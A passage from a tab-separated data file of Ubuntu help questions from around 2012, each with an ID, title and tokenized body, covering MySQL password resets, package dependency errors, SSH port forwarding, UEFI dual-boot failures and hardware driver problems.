txqueuelen:1000 rx bytes:111390 ( 111.3 kb ) tx bytes:4996 ( 4.9 kb ) interrupt:19 base address:0x2080
225467	mount and unmount errors when usb is connected in 12.10 .	i just installed 12.10 and noticed some strange behaviour every time i connect a usb storage device . it reports i already have the device mounted by a different user but there is only one user account on this set up . here is a picture of the dialogue : also when i try to mount the inserted usb drive , i have to enter gain root privileges before the device will unmount successfully . like this : . i ca n't copy/delete any file without root access either with the default file manager or third party file manager , marlin . how do i resolve this rather frustrating experience ? thanks in advance .
225471	how to install minecraft ( server )	i want to install the minecraft server in my ubuntu pc . it can be either the ubuntu desktop or server . how should i proceed to installing the server ?
225472	i would like to have a copy of all the partitions of primary drive to a secondary drive	this is the command : sudo sfdisk -d /dev/sda | sfdisk -- force /dev/sdb it fails because permission is denied and the entire error message looks like this : /dev/sdb : permission denied sfdisk : can not open /dev/sdb read-write warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . i already tried formatting the sdb drive with disk utility or even removing the format and leaving it as unallocated space but nothing succeeded . how should i execute it ? thank you : ) ps : ubuntu 12.04 are used
225475	philips semiconductors saa7160 tv tuner driver installation help	first of all new to linux . ive been trying to install the driver for my tvtuner on my dv6 intel/nvidia setup everytime i try to install the driver i get access denied . so im stumped ? now heres some detail of the driver : multimedia controller : philips semiconductors saa7160 ( rev 03 ) subsystem : avermedia technologies inc device 0a55 flags : bus master , fast devsel , latency 0 , irq 11 memory at da100000 ( 64-bit , non-prefetchable ) [ size=1m ] capabilities : < access denied > also ive downloaded the linux firmware nonfree driver from software centre . put them into lib/firmware folder . i 'm getting quite confused about the command line that i need to get the driver working . ive learnt alot about linux trying to get this working so it has been a good expirience . i am however stuck here now so even if someone says start looking here thats would help . i did look trhough the tvtuner wiki for linux and theres nothing there for this tuner . heres a joke while i wait for an answer ... an android tablet went up to a linux pc and said , 'whats a tablet got ta do to get a root around here ! '
225488	why ca n't i reinstall mysql ?	list item i 've been looking all around the internet for an answer but did n't find anything . i hope you can help me now . i have a server with mysql . from one day to another , mysql did n't let me enter with my root password anymore ( accsess denied for user 'root ' @ 'localhost ' using password : 'yes ' ) . so i tried two ways to reset the password : no.1 : i typed : shell > /etc/init.d/mysqld stop to stop mysql . then i restarted it skipping the grant-tables : shell > mysqld_safe -- skip-grant-tables so i was able to log in as root and change the password using : mysql > update mysql.user set password = password ( 'mynewpassword ' ) where user = 'root ' ; flush privileges ; i restarted mysql and tried to log in as root with my new password - did n't work . so i tried the solution that 's described here : http : //dev.mysql.com/doc/refman/5.0/en/resetting-permissions.html ( i do n't want to post it here because this post is already pretty long ) . did n't work either . actually it made it worse , because since that day , every time i try to start mysql , it does n't even ask me for my password , but i get : shell > error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 111 ) well , i 've looked up what it means and found that my mysqld.sock is missing . i tried to create it using touch but mysql ca n't start with that socket . now i 'm trying to reinstall mysql but everytime i type in shell > apt-get -- purge remove mysql-server mysql-common mysql-client in that or any other order or every one of those three alone , i get : shell > reading package lists ... done shell > building dependency tree shell > reading state information ... done shell > package mysql-client is not installed , so not removed shell > package mysql-server is not installed , so not removed shell > you might want to run 'apt-get -f install ' to correct these : shell > the following packages have unmet dependencies : shell > libmysqlclient18 : depends : mysql-common ( > = 5.5.28-0ubuntu0.12.04.2 ) but it is not going to be installed shell > libmysqlclient18 : i386 : depends : mysql-common : i386 ( > = 5.5.28-0ubuntu0.12.04.2 ) shell > mysql-client-5.5 : depends : mysql-common ( > = 5.5.28-0ubuntu0.12.04.2 ) but it is not going to be installed shell > mysql-server-5.5 : predepends : mysql-common ( > = 5.5.28-0ubuntu0.12.04.2 ) but it is not going to be installed shell > psa-firewall : depends : plesk-core ( > = 11.0.9 ) but it is not installable shell > depends : mysql-server but it is not going to be installed shell > psa-spamassassin : depends : plesk-core ( > = 11.0.9 ) but it is not installable shell > psa-vpn : depends : plesk-core ( > = 11.0.9 ) but it is not installable shell > depends : plesk-base ( > = 11.0.9 ) but it is not installable shell > depends : mysql-server but it is not going to be installed shell > e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . so i said to my self `` let 's just remove those files with depenencies , too '' ( that psa-stuff since plesk is virtual and ca n't be uninstalled ) ... guess what happened : shell > reading package lists ... done shell > building dependency tree shell > reading state information ... done shell > package mysql-client is not installed , so not removed shell > package mysql-server is not installed , so not removed shell > you might want to run 'apt-get -f install ' to correct these : shell > the following packages have unmet dependencies : shell > libmysqlclient18 : depends : mysql-common ( > = 5.5.28-0ubuntu0.12.04.2 ) but it is not going to be installed shell > libmysqlclient18 : i386 : depends : mysql-common : i386 ( > = 5.5.28-0ubuntu0.12.04.2 ) shell > mysql-client-5.5 : depends : mysql-common ( > = 5.5.28-0ubuntu0.12.04.2 ) but it is not going to be installed shell > mysql-server-5.5 : predepends : mysql-common ( > = 5.5.28-0ubuntu0.12.04.2 ) but it is not going to be installed shell > e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . of course i tried apt-get -f install , too many times even . what am i doing wrong ? no matter , which other packages i include into apt-get -- purge remove , i always get new dependencies . do i have to delete every mysql-related directory and file manually ? hope there 's someone out there who can help me ! cheers ! edit : after trying apt-get purge mysql-server mysql-common mysql-client libmysqlclient18 libmysqlclient18 : i386 mysql-client-5.5 mysql-server-5.5 psa-firewall psa-spamassassin psa-vpn reading package lists ... done building dependency tree reading state information ... done package mysql-client is not installed , so not removed package mysql-server is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libdbd-mysql-perl : depends : libmysqlclient18 ( > = 5.5.13-1 ) but it is not going to be installed libmyodbc : depends : libmysqlclient18 ( > = 5.5.13-1 ) but it is not going to be installed libqt4-sql-mysql : i386 : depends : libmysqlclient18 : i386 ( > = 5.5.13-1 ) but it is not going to be installed php5-mysql : depends : libmysqlclient18 ( > = 5.5.13-1 ) but it is not going to be installed ruby-mysql : depends : libmysqlclient18 ( > = 5.5.13-1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . so i tried to remove all these and got : building dependency tree reading state information ... done package mysql-client is not installed , so not removed package mysql-server is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : qlclient18 : i386 mysql the following packages have unmet dependencies : libmysql-ruby1.8 : depends : ruby-mysql but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . s i tried removing that last file , too and was already looking forward to having my problem solved - but i got this : ( reading database ... 73213 files and directories currently installed . ) removing psa-imp ... dpkg action : trying to start service mysql ... /usr/sbin/mysqld ( pid 14824 ) is running ... done trying to establish test connection ... error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 111 ) error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 111 ) where i got the last line quite many times . after that there was this : failed error while trying to establish test connection check the error reason ( see log file : /tmp/plesk_11.0.9_installation.log ) , fix and try again dpkg action : trying to start service mysql ... /usr/sbin/mysqld ( pid 14824 ) is running ... done trying to establish test connection ... error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 111 ) and of course my favourite line was there like a houndret times again the last line was just e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any ideas ?
225496	how can i serve an ubuntu installation image on my server for networkboot ?	i would like to install ubuntu on my netbook , that has no cd-rom . can i serve the live-cd on my other computer , so i can install it via the bios network-boot on my netbook ?
225497	when running `ll` , what does `root root` mean in an entry ?	i 'm curious what the meaning is for the two root entries on terminal when you enter the ll command . i know one is the user but not sure which one . what do both mean and in which order ? for example , jeff @ ubuntu : ~/documents $ ll drwxrwxr-x 2 jeff jeff 4096 dec 3 20:32 mysqlbackup/ -rw-rw-r -- 1 root root 1 dec 3 18:36 essay1.txt
225500	failed network lookup	i 'm running kubuntu 12.10 . i am having three networking problems that i think might actually have a common cause , even though they are in apparently unrelated areas . i had them in 12.04 also : when viewing a number of different videos -- but not youtube -- i get the message ve_fms_connect_failed , which says that the video is not currently available . the launchpad-getkeys program is n't able to find the keys because it ca n't do the nslookup for the keyserver url ( and which url it is does n't matter ) . if i use the -k option with the ip address of the keyserver , however , it works . the program youtube-dl gives url-open errors with this command : youtube-dl http : //www.youtube.com/watch ? v=eqgrroao5-m however , if i precede the command with http_proxy like this : http_proxy= '' 72.64.146.135:8080 '' youtube-dl http : //www.youtube.com/watch ? v=eqgrroao5-m it works . ( i know nothing about that ip address ; i just copied it from a posted example . ) two common elements of these examples are : they only strike a few users , not all . they all involve the failure of some network lookup . two causes that have been suggested are ( a ) firewall interception , or ( b ) proxy misconfiguration . however , ufw tells me that the firewall is inactive , and network settings / proxy tells me that there 's no proxy . i was trying to come up with a more informative title for this thread , but was n't able to .
225505	nautilus wo n't use gnome 3 color scheme ?	i 'm using ubuntu 12.10 gnome remix , and i 've managed to change the color scheme for most of the default adwaita theme , but when i open up nautilus and click on a folder/file , or select something on the desktop , it shows this `` default blue '' color that reminds me of windows , and that clashes just a bit with my current color scheme and desktop background . is there any way i can change just the colors that nautilus uses , or force it to use the theme 's selection colors ?
225508	is there a theme creator and/or editor ?	i want to make my own theme , or edit an existing one . but i ca n't really find an application for ubuntu 12.10 , unity ( 6.10.0 ) . right now i have a theme ( delorean-dark ) that i want to edit , cause of some inconsistencies , and later make my own theme . is there a theme application that can make new and edit existing themes ?
225513	how do i configure juju to use amazon web services ( aws ) ?	i 'd like to deploy services on aws , how can i configure juju to do this ?
225515	can not install ubuntu on an acer aspire one 756	i have used ubuntu before , in virtual machines , but today i decided to make the leap and i bought a netbook to install ubuntu as a `` real '' os alongside windows . the netbook i bought is an acer aspire one 756 , with a 64-bit intel processor , 4gb ram , and windows 8 as the default os . i have now encountered several obstacles that actually prevent me from installing ubuntu 12.10 . here are all the things i have tried so far : used a live cd , in combination with a usb dvd drive . ( i should point out that the aspire one does not have an optical drive . ) the computer does not boot in ubuntu ; the drive keeps spinning , but nothing happens , even though i changed the boot order in the bios . used a usb drive created via the tool available on pendrivelinux.com . again , i 've made changes to the bios to make sure the computer tries to boot from usb before using the built-in hdd . the results vary in this case : sometimes , the computer keeps rebooting like crazy until i remove the usb drive , at which point the computer boots into windows 8 , as expected . if i use a different usb drive , i get an error message that says that the usb drive has been blocked due to `` the current security policy '' . tried to install ubuntu via wubi . the program appears to install something , but at some point during the installation process , i get a non-specified error message and nothing else happens . i am not sure if these are known issues ; in any case , searching the forum has not yielded any results , so i thought i should simply describe my problem here in the hope that this question has not been answered before . i would greatly appreciate any help with this annoying problem . of course , if anything is unclear , do not hesitate to ask for further details .
225519	applications not showing in unity dash	i am running ubuntu 12.04 on an ibm thinkpad t42 . i just installed gnome and cinnamon but i am still using unity the only problem is that in dash when i search for any application they do n't appear . i do n't see recent applications either . i fixed it by running unity -- reset but the next time i turned on my computer it was broken again
225526	how do i change the @ inc variable to use bioperl ?	i have successfully installed bioperl . when i try to use the objects i get an error can not locate bio.seq.pm in @ inc ... .. the `` build '' programs put everything in the `` download '' directory . i am having trouble moving the files to /usr/bin and suspect that maybe adding the `` download '' directory to the @ inc paths might be easier . how can i fix this ?
225527	why do n't my wildcards work ?	in the command line , the wildcards do not seem to work . am i just old-school and they are not used . the manuals seem to describe them . a search command for *.pl should find all perl scripts ... and *.pm should find all perl objects . thanks john
225530	which wine do i need to use itunes	i am looking in the ubuntu software center for wine to run itunes . there are several options , but i 'd thought i 'd ask , which one is the right one to get ? thanks !
225532	how do i install a java plugin for google chrome ?	i 'm a java developer so i have the java 7 jdk installed on my computer from oracle ( sun ) . this obviously comes with the jre . however , google chrome says i need the java plugin and wants me to install a jre . why is it not recognizing the one i already have ?
225536	how to have many ubuntu workstations centrally managed ?	i have about a dozen alienware workstations that are used for cuda development and for execution of mpi jobs . what is the best way to manage them ? i 'd like to have something like an apt-get but for several systems , and a way to reimage a system simply and centrally . it seems that a combination of landscape and canonical 's maas would be a good fit , but i need an open source solution . any thoughts ?
225538	uefi boot failure - hang after printing usb information	i 'm experiencing a really weird boot problem . with both 12.10 and 12.04lts , the vast majority of kernels ( and initrds ) that i 've tried boot , but hang immediately after printing out information about usb devices . this is n't exactly a full `` hang '' so to speak , as if i plug in a flash drive , i see information and a /dev/sd* entry printed to the screen . post/pre-init scripts are not run , there is no handoff , nor busybox or vt prompt . virtual terminals ca n't be changed ( with ctrl-alt-fx ) . for what i can see , init may have not been executed yet . with certain kernel and os combinations however , ( specifically 3.2.0-29 ) , i get a full boot and am able to use the os as if there is no problem . after 3.2.0-29 , i 've been hard pressed to find a kernel that works . any idea what 's happening or how to fix this ? or even a road to take ? i 've exhausted the first five pages of google for every search term i can think of . this is a lenovo z580 ( i5-3210m ) with phoenix securecore tiano firmware , if that helps any .
225539	connecting to vpn disconnects other connections	when i connect to my company 's vpn , my im gets disconnected . same is true if i 'm streaming video . have i configured it wrong ? i am using openvpn on ubuntu 12.10 . thanks !
225546	installing ubuntu on an acer aspire one 722 ( amd c60 )	i 've been an apple and windows-user all my life , and now i bought me an netbook ( acer one aspire 722 ) and wanted to install ubuntu ( i have no experiance with any linux systems at all ) . i read a lot of forums but have n't found my problem anywhere so i hope to find some help here . i need to install ubuntu from an usb drive . i downloaded unetbootin to creat a bootable usb drive with my mac . i createt a bootable ubuntu ( 12.04 ) version on that and plugged it into my netbook . on my netbook i changed the bootorder so it should start from usb first but i simply get a lot of text ( e.g . : ext2-fs ( sda1 ) : error : ext2_lookup : deleted inode referenced : ... . ) but no installation or even an installion screen started . what did i wrong ?
225552	why do n't i have system or application on top ?	so for updating drivers and everything it seems that everyone says go to `` system '' which is at the top , i dont have that . i have `` file edit view go and help '' i have ubuntu 12.10 64 bit ( idk if it makes a diff ) installed on my gt70 dueled with windows 7 . i want to update the drivers for the ubuntu because it seams my wifi card isnt working right and i dont even get a signal when i plug in , so i can only get a wireless signal . and few other things but i guess that is my main question right now is how do i get that system or if i cant how do i do a general check for updating all my drivers ?
225556	i ca n't open ubuntu after a wubi install	i ca n't open ubuntu after the wubi install or with the cd , the white bar just keeps blinking but nothing happens . i have a msi vr602 laptop .
225557	ubuntu splash wo n't change ?	how do i change the boot splash background color to be black , not purple ? i have edited /lib/plymouth/themes/default.grub to if background_color 0,0,0 ; then clear fi then i also changed these rows in /lib/plymouth/themes/ubuntu-logo/ubuntu-logo.script as follows : window.setbackgroundtopcolor ( 0.0 , 0.00 , 0.0 ) ; # nice colour on top of the screen fading to window.setbackgroundbottomcolor ( 0.0 , 0.00 , 0.0 ) ; # an equally nice colour on the bottom then in configuration editor on apps/gnome-session/options/ i have set splash_image to /lib/plymouth/themes/ubuntu-logo/ubuntu_logo.png the result is a bit weird ... when i start the machine , a blank purple screen appears white it boots then the white ubuntu logo and the progress dots appear on a black screen for just a second or two before the login screen . are n't they supposed to replace this purple screen in the whole boot process ? when i shut down or reboot the machine , it is only as it is supposed to according to my settings , i.e . with black background , white ubuntu logo and progress dots . how to fix this ? any ideas ? i do n't like this purple background on every boot at all ... : ( this is on ubuntu 12.04 .
225561	can i set command line executed games to open in a window instead of fullscreen ?	i really enjoy some of the free linux games and just downloaded cave story , one of my all-time favorites . however , i can only play the game in full screen , 800x600 resolution . i was wondering if i could run this program in a window instead of full screen . is there a command or unity plugin to do this ? also , would the same work to run supertux in a window as well ? i 'm running 12.04 if that makes any difference . thanks for your help .
225564	how well does java work on the nexus 7 ?	i require java for work purposes and standard android would not do for me on my nexus , hence i have decided to try to ubuntu route . how do i successfully install java into the ubuntu arm version for the nexus 7 and will it support running *.jnlp java files ?
225566	problem with root password , ubuntu 12.10	couple of hours earlier i installed the drivers of a hp deskjet 3000 , which i found here : http : //hplipopensource.com/ . since that moment i can not install anything from the ubuntu software centre . it seems that my root password is wrong now . but i have n't changed it ! i have no problem log in to my profile , using my ordinary , very first password i have set when i installed ubuntu , but when i need to use it as a root password , it is simply does not work ... any ideas how to fix the mess ? thank you in advance !
225568	find binary linked to a process which crashes soon as launched ?	program a after checking the system configuration executes one of programs b , c or d. when i run program a , it launches one of these and newly launched program crashes ( takes less than a second ) . this prevents me from finding the file via /proc mount . is there a way to know which program was launched ? running program a in gdb did n't help because the the system configuration read by program a changed and it launched a different program . all these binaries ( a , b , c and d ) are in the same directory .
225569	x-notifier does n't work in chromium browser	it just keeps checking in vain . also can not import or export data , but get this error i use the latest versions of both in lubuntu 12.04 . in google chrome it works . what could it be the problem ? edit - following vasa1 's comment - running sudo aa-status i get apparmor module is loaded . 16 profiles are loaded . 16 profiles are in enforce mode . /sbin/dhclient /usr/bin/evince /usr/bin/evince-previewer /usr/bin/evince-previewer//launchpad_integration /usr/bin/evince-previewer//sanitized_helper /usr/bin/evince-thumbnailer /usr/bin/evince-thumbnailer//sanitized_helper /usr/bin/evince//launchpad_integration /usr/bin/evince//sanitized_helper /usr/lib/networkmanager/nm-dhcp-client.action /usr/lib/connman/scripts/dhclient-script /usr/lib/cups/backend/cups-pdf /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper /usr/sbin/cupsd /usr/sbin/ntpd /usr/sbin/tcpdump 0 profiles are in complain mode . 3 processes have profiles defined . 3 processes are in enforce mode . /sbin/dhclient ( 1562 ) /usr/sbin/cupsd ( 916 ) /usr/sbin/ntpd ( 1695 ) 0 processes are in complain mode . 0 processes are unconfined but have a profile defined .
225573	windows 7 doesnt boot after installing ubuntu 12.10 ( asus zenbook prime / uefi problem )	today i installed ubuntu and since then i can not boot into windows anymore . i used the `` standard '' option ( didnt change any partitions manually , just entered the size ) but used the uefi-mode . at first the grub entries for windows did not work at all , after reading this thead i was able to add a new grub entry - now i can get into the `` windows-loading '' screen for a few seconds but then i always see some kind of bluescreen for a fraction of a second and the laptop reboots . i can get into the windows recovery partition but the only option there is to reset everything to factory settings ( +erase all data ) . i have no idea how to get into the windows 7 repair mode which was mentioned here ( tried everything else in this thread too - no success ) . my boot info can be found here : http : //paste.ubuntu.com/1411573/ i have no idea what went wrong ( there is even an extra page for the zenbook prime where no installation problems are mentioned ) . i would appreciate any help/ideas , many thanks ! update after further investigation and grub optimization ( without final success ) i think that the problem is most likely a corrupted windows partition ( or just the start sector ? i can see/mount the windows partition from ubuntu ) . ubuntu works perfectly and windows gets to the `` loading '' screen ( with the fixed grub entries ) but crashes instantly afterwards ( there is a bluescreen for a fraction of a second , afterwards the laptop reboots ) . i tried several windows recovery tools ( windows 7 recovery disk etc . ) but i cant get anything to load nor fix the problem - apparently win7 recovery tools still have big problems with uefi . does anyone have an idea how to fix or investigate a corrupted windows partition from linux ? as described i can see/edit the partition from ubuntu . thank you ! update 2 for my windows partition ( /dev/sda3 ) gparted shows me a size of 86.2gb ( with 72.36 used and 13.84 unused ) while the mounted drive shows a size of 92.6 gb with 77.7 used and 14.9 unsused - could that be a reason for the corruption ? any idea how to fix this from ubuntu ( still couldnt get any windows recovery tools to start from an usb stick.. : ) ? thanks ! final update the problem was in fact a corrupted start sector in windows . after trying around for hours and manually creating an efi-enabled win7 usb stick ( repair disk did not work , full disk was needed ! ) i was able to fix the bootsector . many thanks for your help !
225575	can i restore before lase update in ubuntu 12.10	i have problem in my toshiba l500 when i work on ubuntu , first when i had ubuntu 10.04 , the shipset works all the time , then i resolved it was problems in graphical driver , now when i upgrade to 12.10 the same problem come again i repaired with other driver but at the last update the problem is back .what is the main raison for this problem and why just for toshiba , my friends havent this kind of problem .
225579	how to check whether cmake is installed in ubuntu ?	i installed the cmake in ubuntu , how to check if it installed ?
225580	need to cause a notification in 12.04 from shell	i 'm running lubuntu 12.04 . i have a shell script that tests for a network condition and need some way for it to pop up a notification in the gui . the network testing part is done , but i need some help with the `` pop up a notification in the gui '' part .
225587	keyboard and touchpad not working	my eee pc will allow me to turn on the computer to login page , but i can not get the keypad or the touch pad mouse to move . i have turned it off , taken out the battery then restarted it and the same happens . is there anything i can do to fix this ? thanks for your time ,
225588	how to install `` libgtk1.2 '' on ubuntu 12.04/64bit ?	is there any way to install `` libgtk1.2 '' on ubuntu 12.04 , please ? i try to install that in terminal : sudo apt-add-repository ppa : adamkoczur/gtk1.2 sudo apt-get update sudo apt-get install libgtk1.2 output : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libgtk1.2 e : could n't find any package by regex 'libgtk1.2' any suggestion ?
225590	why does my root filesystem keep becoming read-only ?	i 've lately been having an issue with my root filesystem becoming readonly . it happens some amount of time after boot . i do n't know exactly when it happens , as i do n't usually notice it until something such as suspending the computer or printing fails . it seems to be fairly random . since most of my system is on that partition , i ca n't re-mount it without rebooting . after this happens , the system runs a fsck . sometimes it prompts to fix problems ; other times it apparently finds none . to troubleshoot , i 've searched through the logs but found nothing relevant . this might be due in part to not knowing when the actual errors took place . the filesystem is apparently good to begin with , as when fsck runs its fixes it does n't report any errors . i 've scanned the disk with spinrite . a while ago , spinrite found and recovered from some bad sectors on the hard drive . i ran a level 4 scan ( a thorough scan ) after this probem appeared , but spinrite found nothing . the smart data reports that the disk is ok with 63 bad sectors . the number of bad sectors has n't changed recently . i realize that the disk is n't in the best of conditions , and i have complete backups in case of catastrophic failure . yet the lack of errors in the logs , combined with spinrite 's test results and the unchanged smart data makes me think that this problem has some cause other than disk failure . other than disk failure , what could cause my symptoms ?
225593	ssh from external network refused	i 've installed open-ssh-server on my home computer ( running lubuntu 12.04.1 ) in order to connect to it from school . this is how i 've set up the sshd_config file : # package generated configuration file # see the sshd_config ( 5 ) manpage for details # what ports , ips and protocols we listen for # port 22 port 2222 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth # loglevel info loglevel verbose # authentication : logingracetime 120 permitrootlogin no strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords # passwordauthentication yes # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding no x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net banner /etc/sshbanner.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . usepam yes # specify which accounts can use ssh allowusers onlyme i 've also configured my router 's port forwarding table to include : lan ports : 2222-2222 protocol : tcp lan ip address : `` ip address '' displayed by viewing `` connection information '' from right-click menu of system tray remote ports [ optional ] : n/a remote ip address [ optional ] : n/a i 've tried various other configurations as well , using primary and secondary dns , and also with specifying remote ports 2222-2222 . i 've also tried with tcp/udp ( actually two rules because my router requires separate rules for each protocol ) . with any router port forwarding configuration , i am able to log in with ssh -p 2222 -v localhost but , when i try to log in from school using ssh -p 2222 onlyme @ ip_address i get a `` no route to host '' message . same thing when i use the `` broadcast address '' or `` default route/primary dns '' . when i use the `` subnet mask '' , ssh just hangs . however , when i use the `` secondary dns '' i recieve a `` connection refused '' message . : ^ ( someone please help me figure out how to make this work .
225597	bluetooth detected on 12.04lts but can not connect	i 'm using a iogear gbu311 on my desktop with 12.04lts ( i 'm on kubuntu ) . i see the device in the bluetooth conf . manager . my computer can detect my phone . on my phone ( lg p930 with android 2.3.5 ) i can detect my computer , get paired with it but it refuses to connect . someone has an idea about how to fix this problem ? many thanks !
225600	ubuntu is kde styled after install and removal	i installed kubuntu-desktop and every thing was fine . then later when i actually logged in to kde , i decided that i still like unity better so i ran sudo apt-get purge kubuntu-desktop & & sudo apt-get autoremove . after that bits and pieces of my ubuntu/unity have been kde styled . all browsers have kde icons and some applications show 'about kde ' in their menus , all text fields have that 'bluesh glow ' around them , etc . what is still left of kubuntu ? note : i saw this question and this question , but both where outdated and did n't work .
225606	how to change storage mode to modem mode	my modem is n't in the device list of usb_modeswitch so i can not automatically use the modem in ubuntu . i found the way to change the modem from usb storage mode to modem mode and i can use my modem . but i forgot the instructions . my modem information : vendor/product id : 05 qualcomm , inc. mass storage device
225611	how to merge two .iso split-files into one image-file ?	i am following this tutorial , in order to install android onto my computer via virtual box . my problem is , they want you to download : liveandroidv0.3.iso.001 liveandroidv0.3.iso.002 then they want you to merge these two files in terminal , with : cat liveandroidv0.3.iso.001 liveandroidv0.3.iso.002 > liveandroidv0.3.iso the problem is , whenever i run the command , i get the following output : cat liveandroidv0.3.iso.001 liveandroidv0.3.iso.002 > liveandroidv0.3.iso cat : liveandroidv0.3.iso.001 : no such file or directory cat : liveandroidv0.3.iso.002 : no such file or directory so , i was wondering if there was an alternative way to merge these files , or if you guy 's could help me merge them this way ? additional info : i downloaded the files to my /downloads folder in my /home directory .
225613	how do i prevent wifi cycling between connected and disconnected ?	my friend has a acer aspire 5733z-4851 it keeps disconnecting and connecting to his wifi but his hard wire will run just fine . any suggestions ? all the codes : lspci : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 ethernet controller : broadcom corporation netlink bcm57780 gigabit ethernet pcie ( rev 01 ) 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) lsmod : module size used by snd_seq_dummy 12798 0 rfcomm 46619 0 bnep 18140 2 bluetooth 209199 10 rfcomm , bnep parport_pc 32688 0 ppdev 17073 0 lp 17759 0 parport 46345 3 parport_pc , ppdev , lp binfmt_misc 17500 1 ums_realtek 17949 0 snd_hda_codec_realtek 77876 1 uas 17844 0 coretemp 13400 0 snd_hda_intel 33491 4 snd_hda_codec 134212 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 96580 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30512 1 snd_seq_midi uvcvideo 76749 0 videobuf2_core 32851 1 uvcvideo videodev 120309 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12860 1 uvcvideo videobuf2_memops 13368 1 videobuf2_vmalloc snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61521 3 snd_seq_dummy , snd_seq_midi , snd_seq_midi_event snd_timer 29425 2 snd_pcm , snd_seq arc4 12529 2 snd_seq_device 14497 4 snd_seq_dummy , snd_seq_midi , snd_rawmidi , snd_seq psmouse 95552 0 ath9k 131308 0 tg3 148780 0 snd 78734 17 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device microcode 22803 0 mac80211 539908 1 ath9k ath9k_common 14055 1 ath9k ath9k_hw 395218 2 ath9k , ath9k_common ath 23827 3 ath9k , ath9k_common , ath9k_hw i915 520629 3 soundcore 15047 1 snd serio_raw 13215 0 cfg80211 206566 3 ath9k , mac80211 , ath snd_page_alloc 18484 2 snd_hda_intel , snd_pcm intel_ips 18049 0 lpc_ich 17061 0 drm_kms_helper 46784 1 i915 drm 275528 4 i915 , drm_kms_helper mei 40690 0 i2c_algo_bit 13413 1 i915 joydev 17457 0 acer_wmi 32453 0 sparse_keymap 13890 1 acer_wmi mxm_wmi 12979 0 mac_hid 13205 0 wmi 19070 2 acer_wmi , 